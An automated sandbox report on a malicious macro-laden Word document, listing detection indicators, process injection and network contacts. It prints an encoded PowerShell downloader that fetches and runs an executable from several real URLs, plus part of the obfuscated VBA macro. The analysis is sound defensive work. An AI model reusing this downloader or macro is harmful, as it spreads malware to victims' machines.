RE_583658295301_1004.doc
This report is generated from a file or URL submitted to this webservice on October 4th 2019 20:51:42 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware
- POSTs files to a webserver
- Persistence
- Spawns a lot of processes
- Network Behavior
- Contacts 1 domain and 1 host. View all details
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 13
-
External Systems
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 13/59 Antivirus vendors marked sample as malicious (22% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 13/59 Antivirus vendors marked sample as malicious (22% detection rate)
- source
- External System
- relevance
- 8/10
-
Sample was identified as malicious by a large number of Antivirus engines
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET /2tgmnk/fJZIPCYV/ HTTP/1.1
Host: www.eteensblog.com
Connection: Keep-Alive" - source
- Network Traffic
- relevance
- 10/10
-
The analysis spawned a process that was identified as malicious
- details
-
13/69 Antivirus vendors marked spawned process "897.exe" (PID: 3536) as malicious (classified as "Packed-FVW" with 18% detection rate)
13/69 Antivirus vendors marked spawned process "897.exe" (PID: 3372) as malicious (classified as "Packed-FVW" with 18% detection rate)
13/69 Antivirus vendors marked spawned process "capprep.exe" (PID: 3396) as malicious (classified as "Packed-FVW" with 18% detection rate)
13/69 Antivirus vendors marked spawned process "capprep.exe" (PID: 2400) as malicious (classified as "Packed-FVW" with 18% detection rate) - source
- Monitored Target
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Writes data to a remote process
- details
-
"powershell.exe" wrote 32 bytes to a remote process "%USERPROFILE%\897.exe" (Handle: 1644)
"powershell.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 1644)
"powershell.exe" wrote 8 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 1644)
"powershell.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 1644)
"897.exe" wrote 32 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 364)
"897.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 364)
"897.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 364)
"897.exe" wrote 8 bytes to a remote process "C:\Users\%USERNAME%\897.exe" (Handle: 364)
"capprep.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\capprep.exe" (Handle: 260)
"capprep.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\capprep.exe" (Handle: 260)
"capprep.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\capprep.exe" (Handle: 260)
"capprep.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\capprep.exe" (Handle: 260) - source
- API Call
- relevance
- 6/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Writes data to a remote process
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "146.82.206.253": ...
URL: http://www.eteensblog.com/2tgmnk/fJZIPCYV/ (AV positives: 8/71 scanned on 10/04/2019 20:38:08)
URL: http://www.eteensblog.com/2tgmnk/fJZIPCYV (AV positives: 6/72 scanned on 10/04/2019 18:15:12)
URL: http://contactlenses.cc/ (AV positives: 2/70 scanned on 07/21/2019 05:51:05)
URL: http://galleries10.exploitedteens.com/ (AV positives: 1/50 scanned on 11/07/2013 03:56:09)
File SHA256: 4e2f067e6fba50b24d168515dce7f31da8bd4d3e9f93fa047d404878f338a710 (AV positives: 13/72 scanned on 10/04/2019 20:31:51)
File SHA256: faabccb1ffe41bc64521776a9ce31eb61725beb8efaad424de61bc6aa432d09c (AV positives: 16/71 scanned on 10/04/2019 20:05:50)
File SHA256: 3f1f8fd989386c1beddf6223113b18d788f4862325bfae0828080e29e067599b (AV positives: 17/72 scanned on 10/04/2019 18:20:20)
File SHA256: a6e58fcdd3b8743865c45d8035bcca1f3ebfde77d9ff9139b5a379289a088cd7 (AV positives: 15/73 scanned on 10/04/2019 18:11:19) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1137 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\RE_583658295301_1004.doc"" (Show Process)
Spawned process "powershell.exe" with commandline "powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABtAG8AdABpAHYAYQB0AGkAbgBnAHEAdQBxAD0AJwBJAG4AdABlAGwAbABpAGcAZQBuAHQAYgBxAHYAJwA7ACQAbQBvAGQAZQBsAHMAdgBoAHoAIAA9ACAAJwA4ADkANwAnADsAJABBAHMAcwBpAHMAdABhAG4AdABvAHAAegA9ACcASABhAG4AZABjAHIAYQBmAHQAZQBkAGMAcgBkACcAOwAkAHMAbwBsAGkAZABfAHMAdABhAHQAZQB6AGMAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbQBvAGQAZQBsAHMAdgBoAHoAKwAnAC4AZQB4AGUAJwA7ACQAcABsAHUAbQBrAHEAagA9ACcAVQBTAF8ARABvAGwAbABhAHIAagBzAHoAJwA7ACQAZwByAGUAZQBuAGoAdwBhAD0ALgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABpAGUAbgBUADsAJABSAHUAcwB0AGkAYwBfAEMAbwB0AHQAbwBuAF8ARgBpAHMAaABzAHYAbAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGUAdABlAGUAbgBzAGIAbABvAGcALgBjAG8AbQAvADIAdABnAG0AbgBrAC8AZgBKAFoASQBQAEMAWQBWAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AcABhAGwAaQBzAGUAawAuAGMAegAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFkAdABnAEoAYgBXAFEATgB0AEoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAG4AbQBpAG4AZgByAGEAcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHoAZQB0AGUAWABlAEoAWQBDAC8AQABoAHQAdABwADoALwAvAGEAYgBiAGEAcwBhAHIAZwBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHMAcQBoAHoAdABqADQAXwBkAHoAcQAzAGUALQAwADEAOQA4ADAAMgAxADUANQAvAEAAaAB0AHQAcABzADoALwAvAHcAZQBpAHEAaQBuAGcANwAuAGMAbwBtAC8AZQB4ADYALwAzAHIAMgBqAHMAXwBvAGMAZwByADMAYgBlAHcAOAA3AC0ANQAzADgANAA2ADAALwAnAC4AIgBzAGAAUABMAGkAVAAiACgAJwBAACcAKQA7ACQARwByAGEAcABoAGkAYwBhAGwAXwBVAHMAZQByAF8ASQBuAHQAZQByAGYAYQBjAGUAegB2AHUAPQAnAEEAZAB2AGEAbgBjAGUAZABpAG4AZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAVQBTAF8ARABvAGwAbABhAHIAcgBiAHIAIABpAG4AIAAkAFIAdQBzAHQAaQBjAF8AQwBvAHQAdABvAG4AXwBGAGkAcwBoAHMAdgBsACkAewB0AHIAeQB7ACQAZwByAGUAZQBuAGoAdwBhAC4AIgBEAGAAbwB3AE4AYABMAE8AQQBkAGYAaQBMAEUAIgAoACQAVQBTAF8ARABvAGwAbABhAHIAcgBiAHIALAAgACQAcwBvAGwAaQBkAF8AcwB0AGEAdABlAHoAYwBoACkAOwAkAHcAaQByAGUAbABlAHMAcwBmAHUAZAA9ACcAdwBvAHIAbABkAGMAbABhAHMAcwBuAGsAcAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAHMAbwBsAGkAZABfAHMAdABhAHQAZQB6AGMAaAApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADIANwA1ADQAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAHIAdAAiACgAJABzAG8AbABpAGQAXwBzAHQAYQB0AGUAegBjAGgAKQA7ACQAYQByAHIAYQB5AHYAaABjAD0AJwBtAGEAcgBvAG8AbgBoAGEAdAAnADsAYgByAGUAYQBrADsAJABBAHoAZQByAGIAYQBpAGoAYQBuAHcAagBrAD0AJwBjAGEAbABjAHUAbABhAHQAZQB1AGYAdwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABHAHUAeQBhAG4AYQBsAHMAdwA9ACcATABvAGMAawBzAG0AdgBvACcA" (Show Process)
Spawned process "897.exe" (Show Process)
Spawned process "897.exe" with commandline "--caaf215f" (Show Process)
Spawned process "capprep.exe" (Show Process)
Spawned process "capprep.exe" with commandline "--83c0e935" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 4 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 22
-
Anti-Detection/Stealthyness
-
Contains ability to open/control a service
- details
-
OpenServiceW@ADVAPI32.DLL from 897.exe (PID: 3372) (Show Stream)
OpenServiceW@ADVAPI32.DLL from 897.exe (PID: 3372) (Show Stream)
OpenServiceW@ADVAPI32.DLL from 897.exe (PID: 3372) (Show Stream)
OpenServiceW@ADVAPI32.DLL from capprep.exe (PID: 2400) (Show Stream)
OpenServiceW@ADVAPI32.DLL from capprep.exe (PID: 2400) (Show Stream)
OpenServiceW@ADVAPI32.DLL from capprep.exe (PID: 2400) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 8/10
- ATT&CK ID
- T1035 (Show technique in the MITRE ATT&CK™ matrix)
-
Possibly tries to hide a process launching it with different user credentials
- details
-
CreateProcessAsUserW@ADVAPI32.DLL from 897.exe (PID: 3372) (Show Stream)
CreateProcessAsUserW@ADVAPI32.DLL from capprep.exe (PID: 2400) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 3/10
-
Contains ability to open/control a service
-
Anti-Reverse Engineering
-
Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
- details
-
"powershell.exe" is allocating memory with PAGE_GUARD access rights
"897.exe" is protecting 48760 bytes with PAGE_GUARD access rights
"897.exe" is protecting 2862 bytes with PAGE_GUARD access rights
"897.exe" is protecting 15072 bytes with PAGE_GUARD access rights
"897.exe" is protecting 4 bytes with PAGE_GUARD access rights
"897.exe" is protecting 1012 bytes with PAGE_GUARD access rights
"capprep.exe" is protecting 48760 bytes with PAGE_GUARD access rights
"capprep.exe" is protecting 2862 bytes with PAGE_GUARD access rights - source
- API Call
- relevance
- 10/10
-
Creates guarded memory regions (anti-debugging trick to avoid memory dumping)
-
Environment Awareness
-
Contains ability to enumerate services
- details
-
EnumServicesStatusExW@ADVAPI32.DLL from 897.exe (PID: 3372) (Show Stream)
EnumServicesStatusExW@ADVAPI32.DLL from capprep.exe (PID: 2400) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 7/10
- ATT&CK ID
- T1120 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to query CPU information
- details
-
cpuid from 897.exe (PID: 3536) (Show Stream)
cpuid from 897.exe (PID: 3372) (Show Stream)
cpuid from capprep.exe (PID: 3396) (Show Stream)
cpuid from capprep.exe (PID: 2400) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
- ATT&CK ID
- T1082 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to enumerate services
-
General
-
POSTs files to a webserver
- details
-
"POST /dma/usbccid/sess/ HTTP/1.1
Referer: http://172.105.11.15/dma/usbccid/sess/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 172.105.11.15:8080
Content-Length: 475
Connection: Keep-Alive
Cache-Control: no-cache" with no payload - source
- Network Traffic
- relevance
- 5/10
-
The analysis extracted a file that was identified as malicious
- details
- 13/69 Antivirus vendors marked dropped file "897.exe" as malicious (classified as "Packed-FVW" with 18% detection rate)
- source
- Binary File
- relevance
- 10/10
-
POSTs files to a webserver
-
Installation/Persistance
-
Allocates virtual memory in a remote process
- details
- "powershell.exe" allocated memory in "\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap"
- source
- API Call
- relevance
- 7/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to download files from the internet
- details
- InternetReadFile@WININET.DLL from capprep.exe (PID: 2400) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Creates new processes
- details
-
"897.exe" is creating a new process (Name: "%USERPROFILE%\897.exe", Handle: 364)
"capprep.exe" is creating a new process (Name: "%WINDIR%\SysWOW64\capprep.exe", Handle: 260) - source
- API Call
- relevance
- 8/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
-
"powershell.exe" opened "\Device\MountPointManager"
"897.exe" opened "\Device\MountPointManager" - source
- API Call
- relevance
- 5/10
-
Allocates virtual memory in a remote process
-
Network Related
-
Found potential IP address in binary/memory
- details
- "172.105.11.15"
- source
- File/Memory
- relevance
- 3/10
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
- TCP traffic to 146.82.206.253 on port 80 is sent without HTTP header
- source
- Network Traffic
- relevance
- 5/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Found potential IP address in binary/memory
-
Pattern Matching
-
Contains ability to download files from the internet
- details
- InternetReadFile@WININET.DLL from capprep.exe (PID: 2400) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains ability to download files from the internet
-
Spyware/Information Retrieval
-
Contains ability to enumerate processes/modules/threads
- details
-
CreateToolhelp32Snapshot@KERNEL32.DLL from 897.exe (PID: 3536) (Show Stream)
CreateToolhelp32Snapshot@KERNEL32.DLL from 897.exe (PID: 3372) (Show Stream)
CreateToolhelp32Snapshot@KERNEL32.DLL from capprep.exe (PID: 3396) (Show Stream)
CreateToolhelp32Snapshot@KERNEL32.DLL from capprep.exe (PID: 2400) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 5/10
- ATT&CK ID
- T1215 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains ability to enumerate processes/modules/threads
-
System Security
-
Modifies proxy settings
- details
-
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"powershell.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"capprep.exe" (Access type: "SETVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"capprep.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"capprep.exe" (Access type: "DELETEVAL"; Path: "HKU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Modifies proxy settings
-
Unusual Characteristics
-
Contains ability to flush the cache line
- details
- clflush byte ptr [FFFFFFFFC592F8FFh] from powershell.exe (PID: 2684) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "Open" which indicates: "May open a file"
Found suspicious keyword "VIRTUAL" which indicates: "May detect virtualization"
Found suspicious keyword "Run" which indicates: "May run an executable file or a system command"
Found suspicious keyword "system" which indicates: "May run an executable file or a system command on a Mac (if combined with libc.dylib)"
Found suspicious keyword "ShowWindow" which indicates: "May hide the application" - source
- Static Parser
- relevance
- 10/10
-
Invokes a process with a very long commandline
- details
- "powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABtAG8AdABpAHYAYQB0AGkAbgBnAHEAdQBxAD0AJwBJAG4AdABlAGwAbABpAGcAZQBuAHQAYgBxAHYAJwA7ACQAbQBvAGQAZQBsAHMAdgBoAHoAIAA9ACAAJwA4ADkANwAnADsAJABBAHMAcwBpAHMAdABhAG4AdABvAHAAegA9ACcASABhAG4AZABjAHIAYQBmAHQAZQBkAGMAcgBkACcAOwAkAHMAbwBsAGkAZABfAHMAdABhAHQAZQB6AGMAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbQBvAGQAZQBsAHMAdgBoAHoAKwAnAC4AZQB4AGUAJwA7ACQAcABsAHUAbQBrAHEAagA9ACcAVQBTAF8ARABvAGwAbABhAHIAagBzAHoAJwA7ACQAZwByAGUAZQBuAGoAdwBhAD0ALgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABpAGUAbgBUADsAJABSAHUAcwB0AGkAYwBfAEMAbwB0AHQAbwBuAF8ARgBpAHMAaABzAHYAbAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGUAdABlAGUAbgBzAGIAbABvAGcALgBjAG8AbQAvADIAdABnAG0AbgBrAC8AZgBKAFoASQBQAEMAWQBWAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AcABhAGwAaQBzAGUAawAuAGMAegAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFkAdABnAEoAYgBXAFEATgB0AEoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAG4AbQBpAG4AZgByAGEAcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHoAZQB0AGUAWABlAEoAWQBDAC8AQABoAHQAdABwADoALwAvAGEAYgBiAGEAcwBhAHIAZwBvAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHMAcQBoAHoAdABqADQAXwBkAHoAcQAzAGUALQAwADEAOQA4ADAAMgAxADUANQAvAEAAaAB0AHQAcABzADoALwAvAHcAZQBpAHEAaQBuAGcANwAuAGMAbwBtAC8AZQB4ADYALwAzAHIAMgBqAHMAXwBvAGMAZwByADMAYgBlAHcAOAA3AC0ANQAzADgANAA2ADAALwAnAC4AIgBzAGAAUABMAGkAVAAiACgAJwBAACcAKQA7ACQARwByAGEAcABoAGkAYwBhAGwAXwBVAHMAZQByAF8ASQBuAHQAZQByAGYAYQBjAGUAegB2AHUAPQAnAEEAZAB2AGEAbgBjAGUAZABpAG4AZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAVQBTAF8ARABvAGwAbABhAHIAcgBiAHIAIABpAG4AIAAkAFIAdQBzAHQAaQBjAF8AQwBvAHQAdABvAG4AXwBGAGkAcwBoAHMAdgBsACkAewB0AHIAeQB7ACQAZwByAGUAZQBuAGoAdwBhAC4AIgBEAGAAbwB3AE4AYABMAE8AQQBkAGYAaQBMAEUAIgAoACQAVQBTAF8ARABvAGwAbABhAHIAcgBiAHIALAAgACQAcwBvAGwAaQBkAF8AcwB0AGEAdABlAHoAYwBoACkAOwAkAHcAaQByAGUAbABlAHMAcwBmAHUAZAA9ACcAdwBvAHIAbABkAGMAbABhAHMAcwBuAGsAcAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAHMAbwBsAGkAZABfAHMAdABhAHQAZQB6AGMAaAApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADIANwA1ADQAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAHIAdAAiACgAJABzAG8AbABpAGQAXwBzAHQAYQB0AGUAegBjAGgAKQA7ACQAYQByAHIAYQB5AHYAaABjAD0AJwBtAGEAcgBvAG8AbgBoAGEAdAAnADsAYgByAGUAYQBrADsAJABBAHoAZQByAGIAYQBpAGoAYQBuAHcAagBrAD0AJwBjAGEAbABjAHUAbABhAHQAZQB1AGYAdwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABHAHUAeQBhAG4AYQBsAHMAdwA9ACcATABvAGMAawBzAG0AdgBvACcA" on 2019-10-4.22:53:14.617
- source
- Monitored Target
- relevance
- 10/10
-
Contains ability to flush the cache line
-
Hiding 2 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 25
-
Environment Awareness
-
Contains ability to query the machine version
- details
-
RtlGetVersion@NTDLL.DLL from 897.exe (PID: 3536) (Show Stream)
RtlGetVersion@NTDLL.DLL from 897.exe (PID: 3372) (Show Stream)
RtlGetVersion@NTDLL.DLL from capprep.exe (PID: 3396) (Show Stream)
RtlGetVersion@NTDLL.DLL from capprep.exe (PID: 2400) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Possibly tries to detect the presence of a debugger
- details
-
GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3536) (Show Stream)
GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3536) (Show Stream)
GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3536) (Show Stream)
GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3536) (Show Stream)
GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3372) (Show Stream)
GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3372) (Show Stream)
GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3372) (Show Stream)
GetProcessHeap@KERNEL32.DLL from 897.exe (PID: 3372) (Show Stream)
GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 3396) (Show Stream)
GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 3396) (Show Stream)
GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 3396) (Show Stream)
GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 3396) (Show Stream)
GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 2400) (Show Stream)
GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 2400) (Show Stream)
GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 2400) (Show Stream)
GetProcessHeap@KERNEL32.DLL from capprep.exe (PID: 2400) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query the machine version
-
General
-
Contacts domains
- details
- "www.eteensblog.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "146.82.206.253:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains PDB pathways
- details
- "powershell.pdb"
- source
- File/Memory
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "virtualjnt.cls" (Streampath: "Macros/VBA/virtualjnt") has code: ""
File "bluezij.bas" (Streampath: "Macros/VBA/bluezij") has code: "Function Surinamenjp()
On Error Resume Next
'/Floridazun
'Lead 24/365 interfaces Uzbekistan action-items CSS Awesome Soft Table District facilitate violet
Azerbaijanian_Manatsjt = "Solutions Illinois solution Personal Loan Account Facilitator connect Illinois Practical Fresh Pants overriding backing up Factors"
'/Rieljfm
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'transform viral Wooden web-enabled Borders Incredible hacking national magnetic utilize Prairie Tools & Health
Savings_Accountjhd = Azerbaijanian_Manatsjt + CInt(256) 'Alabama Venezuela Views Generic Fresh Mouse Egypt IB Bedfordshire Games
'quantify bandwidth Unbranded Cotton Tuna Central bandwidth mobile Home Loan Account collaborative Turkmenistan Concrete
multibytecji = Azerbaijanian_Manatsjt + Len("402") 'Face to face Rustic Awesome Malawi Metal Tactics Personal Loan Account programming robust black
'Wooden Steel Pound Sterling demand-driven Incredible Granite Keyboard Sleek Plastic Table Supervisor neural Cotton
Directorfjt = Azerbaijanian_Manatsjt + CInt(475) 'scalable Sleek Plastic Chicken index Investment Account bus Wooden Small Granite Bacon end-to-end engineer Soft artificial intelligence
'Knoll National Implemented Handmade Soft Chair Dynamic Customer Reunion bandwidth channels communities
Driveswjq = Azerbaijanian_Manatsjt + Len("112") 'zero defect Wyoming Cambridgeshire Industrial & Tools black Plastic Fiji pink Iraqi Dinar leading-edge Intelligent Legacy
'alarm Small Plastic Computer Croatian Kuna Frozen compress AGP program
New_Yorkrfh = Azerbaijanian_Manatsjt + Len("538") 'Sleek Steel Tuna Dam Monitored Senior Argentina Corporate FTP Handmade Cotton
'Cambridgeshire Toys open-source Motorway Applications systems Steel Estates
bandwidthzia = Azerbaijanian_Manatsjt + CStr(Licensedhrw) 'dynamic Light Savings Account methodical withdrawal Brand
'Divide Rustic Plastic Fish Granite Brand invoice invoice Communications Fantastic hack budgetary management redundant Washington SAS sensor
Wend
'Regional impactful Licensed B2C Graphic Interface Senior
Sleekoqn = Brunei_Dollarhhi + "p" + Health__Toysfwz(virtualjnt.Toystcj + virtualjnt.parsingmls) 'Digitized payment wireless olive Ethiopia Auto Loan Account copy bricks-and-clicks Lakes FTP connect Incredible Metal Keyboard
'/structurebqj
'hacking reciprocal Fantastic white Investor reboot Wooden Checking Account Orchestrator sensor transmit Pine circuit New Mexico
Azerbaijanian_Manatsjt = "pricing structure Books & Baby backing up mindshare white Home Loan Account repurpose Quality needs-based Saudi Riyal Malawi"
'/synthesizingpui
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Florida streamline feed Intelligent Fresh Soap Corporate Investment Account RSS
Handcrafted_Soft_Balltjz = Azerbaijanian_Manatsjt + CInt(866) 'distributed deposit Manors overriding models Checking Account
'Auto Loan Account THX Networked optical responsive parallelism invoice
Awesome_Steel_Soapdik = Azerbaijanian_Manatsjt + Len("604") 'synergies Savings Account Awesome neural transform Movies Incredible Generic Steel Car Industrial & Clothing uniform Rubber
'Intelligent Granite Gloves Infrastructure Cliff generating orchid Intelligent online calculate Administrator Denar Wooden national withdrawal solutions
ebusinessivu = Azerbaijanian_Manatsjt + CInt(301) 'B2B Representative quantify synthesizing Handmade Checking Account Borders Isle Data generate Branding Assurance
'Global Fantastic Steel Ball Lead payment transitional Savings Account Bedfordshire invoice Illinois synthesize
Intelligent_Granite_Shoeslnw = Azerbaijanian_Manatsjt + Len("846") 'Awesome Metal Salad bus invoice whiteboard B2B Gorgeous Granite Table transmit generating
'ubiquitous internet solution transmitter knowledge user parsing Metal Implementation Berkshire deposit Alaska unleash salmon Inlet
strategizeitt = Azerbaijanian_Manatsjt + Len("450") 'Gorgeous Danish Krone lime initiatives embrace challenge Unbranded Granite Computer Fantastic New York next-generation back up calculate
'regional Persistent feed Markets protocol THX navigate product copying tan
Centralmlf = Azerbaijanian_Manatsjt + CStr(copybaz) 'Technician Bedfordshire Manat Books, Computers & Health withdrawal Mississippi Personal Loan Account index Ferry panel Flat
'Ports Incredible Rubber Chair applications national Glens Chief Quality Health & Kids Distributed azure invoice
Wend
'Tasty Rubber Gloves Object-based Ergonomic Concrete Keyboard generating communities Licensed Refined Fresh Pants Health, Outdoors & Electronics
Creekvak = auxiliaryfik 'cross-platform TCP Monitored multimedia parse Fords Architect Gorgeous quantifying neural methodologies Open-source web-readiness
Set Rustic_Concrete_Baconflz = CreateObject(Health__Toysfwz(Health__Toysfwz(CStr(199017 + 61 - 199017) + "6161616161616161616161winmgmt61616161s:Win32_616161616161Proce616161616161616161ss")))
Creekvak = Creekvak + Rustic_Concrete_Baconflz.Create((Sleekoqn), Runlzr, upwardtrendingjtc, quantifyingkkj)
'/mobilezvj
'value-added impactful tan Brunei Dollar SAS Ergonomic Frozen Chicken Walk withdrawal Home Loan Account violet primary mint green deposit
Azerbaijanian_Manatsjt = "cross-platform Hills Field Concrete utilisation parse Taiwan Freeway Licensed Bahamian Dollar Managed throughput"
'/Groupiuh
While Azerbaijanian_Manatsjt = wdXMLValidationStatusOK
'Internal programming Expanded Avenue quantifying installation generate Buckinghamshire
